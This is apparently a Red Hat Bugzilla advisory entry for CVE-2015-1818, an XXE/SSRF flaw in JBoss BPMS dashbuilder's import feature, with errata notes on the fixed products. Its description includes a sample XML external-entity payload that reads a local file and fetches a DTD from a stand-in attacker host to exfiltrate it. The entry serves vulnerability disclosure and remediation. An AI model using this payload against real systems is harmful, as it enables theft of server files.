Bug 1201714 (CVE-2015-1818)

Summary: CVE-2015-1818 dashbuilder: XXE/SSRF vulnerability
Product: [Other] Security Response Reporter: Martin Prpič <mprpic>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: alazarot, aszczucz, chazlett, etirelli, jcoleman, lpetrovi, mbaluch, mwinkler, nwallace, rrajasek, rzhang, tkirby
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
A flaw was found in the dashbuilder import facility: the DocumentBuilders instantiated in org.jboss.dashboard.export.ImportManagerImpl did not disable external entities. This could allow an attacker to perform a variety of XML External Entity (XXE) and Server-Side Request Forgery (SSRF) attacks.
 Story Points: ---
Clone Of: Environment:
Last Closed: 2019-06-08 02:39:34 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1211315, 1211316, 1211317, 1211318, 1211319, 1211320, 1246170    
Bug Blocks: 1201717, 1244364, 1244365    

Description Martin Prpič 2015-03-13 10:25:08 UTC 
A flaw was found in the dashbuilder import facility of JBoss BPMS 6: the DocumentBuilders instantiated in org.jboss.dashboard.export.ImportManagerImpl do not disable external entities.

This could allow an attacker to perform a variate of XXE/SSRF attacks. Exfiltrating data using a general entity attack is not obviously possible, but standard parameter entity exfiltration techniques will work.

For example, importing the following file:

<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///tmp/loot.txt">
<!ENTITY % dtd SYSTEM "http://attacker.com/send.dtd">
%dtd;
%send;
]]>
<doc>bar</doc>

causes Send.dtd to be retrieved, and loot.txt to be exfiltrated if send.dtd contains the appropriate content.

Acknowledgements:

Red Hat would like to thank David Jorm of IIX Product Security for reporting this issue.
Comment 4 errata-xmlrpc 2015-08-03 19:41:16 UTC 
This issue has been addressed in the following products:

  JBoss BPM Suite 6.1.2

Via RHSA-2015:1539 https://rhn.redhat.com/errata/RHSA-2015-1539.html
Comment 5 errata-xmlrpc 2015-09-02 16:28:20 UTC 
This issue has been addressed in the following products:

  JBoss Data Virtualization 6.1.0

Via RHSA-2015:1704 https://rhn.redhat.com/errata/RHSA-2015-1704.html